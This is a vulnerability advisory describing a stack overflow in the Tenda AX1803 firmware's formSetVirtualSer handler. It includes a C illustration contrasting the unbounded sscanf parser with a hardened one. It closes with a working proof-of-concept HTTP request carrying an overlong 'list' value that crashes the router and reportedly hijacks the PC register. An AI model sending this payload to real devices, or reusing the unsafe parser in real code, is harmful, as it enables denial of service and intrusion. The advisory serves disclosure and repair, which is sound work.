- Manufacturer's website: https://www.tenda.com.cn
- Firmware download address: https://www.tenda.com.cn/download/detail-3421.html
- Affected version: Tenda AX1803 V1.0.0.1 (the latest version, tested under emulation)

Vulnerability overview:
The Tenda AX1803 (V1.0.0.1) was found to have a stack overflow vulnerability in the formSetVirtualSer function. An attacker can obtain a stable root shell through a carefully constructed payload.
In the formSetVirtualSer function, v2 (the value of the list parameter) that we submit is passed into the sub_89D3C function as an argument, and that function contains the stack overflow.
In the sub_89D3C function, a2 (the value of list) is parsed with _isoc99_sscanf using the format string %[^,]%*c%[^,]%*c%[^,]%*c%s. None of the conversions carries a width limit, so this greedy matching is not safe: as soon as a submitted field is larger than the destination buffer (s, v12, v13 or v14), the write runs past the end of that stack buffer and causes a stack overflow.
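The following C program is an added illustration of the defect described above and of the fix a vendor would apply; it is not code from the advisory or from the Tenda firmware. It reproduces the quoted format string in a deliberately unsafe parser (kept only for comparison) next to a hardened parser that width-limits every conversion and uses %n to reject any entry whose fields were truncated. The buffer size FIELD_MAX, the field array f[4], the function names and the sample inputs are all assumptions made for this example; the real stack buffer sizes in sub_89D3C are not stated in the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Assumed field size for this example; the firmware's real stack buffers are not known. */
#define FIELD_MAX 32

struct vserver_entry {
    char f[4][FIELD_MAX];   /* the four comma-separated fields (s, v12, v13, v14 in the advisory) */
};

/*
 * Vulnerable pattern: %[^,] and %s carry no width, so sscanf copies until the
 * next comma (or whitespace) no matter how small the destination is. This
 * mirrors the format string quoted in the advisory and must never see
 * untrusted input; it is here only for comparison with the hardened form.
 */
int parse_entry_unsafe(const char *list, struct vserver_entry *e)
{
    return sscanf(list, "%[^,]%*c%[^,]%*c%[^,]%*c%s",
                  e->f[0], e->f[1], e->f[2], e->f[3]) == 4;
}

/*
 * Hardened form: every conversion is limited to 31 characters (FIELD_MAX - 1,
 * leaving room for the terminator), and %n records how much input was consumed.
 * If a field is longer than its buffer, sscanf silently truncates it and leaves
 * the remainder unread, so "consumed != strlen(list)" detects the truncation
 * (and any trailing data) and the entry is rejected instead of overflowing.
 */
int parse_entry_bounded(const char *list, struct vserver_entry *e)
{
    int consumed = 0;
    int n = sscanf(list, "%31[^,]%*c%31[^,]%*c%31[^,]%*c%31s%n",
                   e->f[0], e->f[1], e->f[2], e->f[3], &consumed);
    if (n != 4)
        return -1;                      /* fewer than four fields present */
    if ((size_t)consumed != strlen(list))
        return -1;                      /* a field was truncated or input has trailing data */
    return 0;
}

/* Convenience wrapper: 1 if the bounded parser accepts the list, 0 if it rejects it. */
int entry_accepted(const char *list)
{
    struct vserver_entry e;
    return parse_entry_bounded(list, &e) == 0;
}

/* Constructed sample in the shape of the advisory's PoC: a 300-byte first field, then ",b,c,d~". */
const char *sample_overlong_list(void)
{
    static char buf[400];
    memset(buf, 'a', 300);
    buf[300] = '\0';
    strcat(buf, ",b,c,d~");
    return buf;
}

int main(void)
{
    struct vserver_entry e;
    const char *good = "tcp,8080,80,192.168.0.100";   /* constructed, well-formed entry */

    if (parse_entry_bounded(good, &e) == 0)
        printf("accepted: %s %s %s %s\n", e.f[0], e.f[1], e.f[2], e.f[3]);

    printf("over-long field rejected: %s\n",
           entry_accepted(sample_overlong_list()) ? "no" : "yes");
    return 0;
}
```

The %n check matters because a width limit alone only stops the overflow: with truncation, the unread tail of an over-long field would be misread as the following fields, so the request could still be accepted with garbage values. Rejecting the whole entry when the consumed length does not equal the input length turns the overflow into a clean parse error.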
To reproduce the vulnerability, follow these steps:
- Boot the firmware with qemu-system or by other means (e.g. on a real device)
- Send the following PoC request
POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos_pw=eee:language=cn
list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~
By sending this PoC, we can achieve the effect of a denial-of-service (DoS) attack.
As shown in the figure above, we can hijack the PC register.
Finally, an exploit can also be written to obtain a stable root shell.